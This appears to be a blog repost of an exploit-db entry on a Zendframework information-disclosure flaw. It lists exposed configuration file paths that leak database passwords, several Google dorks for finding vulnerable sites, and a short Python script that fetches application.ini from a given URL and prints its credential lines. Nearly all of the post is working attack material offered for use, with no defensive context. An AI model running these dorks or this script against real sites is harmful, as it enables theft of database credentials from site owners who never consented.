quarta-feira, 21 de janeiro de 2015

Zend-Framework Full Info Disclosure

# Exploit Title : Zend-Framework Full Info Disclosure
# Google Dork : inurl:/application/configs/application.ini
# Date : 26/11/2013
# Exploit Author : Ariel Orellana
# Vendor Homepage : http://framework.zend.com/
# Category : Web applications
# Tested on : GNU/Linux

#[Comment]Greetz : Daniel Godoy

#[PoC] :
#The username and password of the database may be obtained trough the "application.ini" file

#Vulnerable page : http://target.com/application/configs/application.ini
#Vulnerable page : http://target.com/application/configs/application.ini
#Vulnerable page : http://target.com/application/configs/db.ini
#Vulnerable page : http://target.com/application/configs/config.ini



Dork -> inurl:/application/configs/application.ini

Dork -> site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"

Dork -> -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini

Dork -> inurl:/configs/ "params.password" db.ini ext:ini

Dork -> -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password

#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/application/configs/application.ini"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

http://www.exploit-db.com/exploits/29921/



0 comentários:

Postar um comentário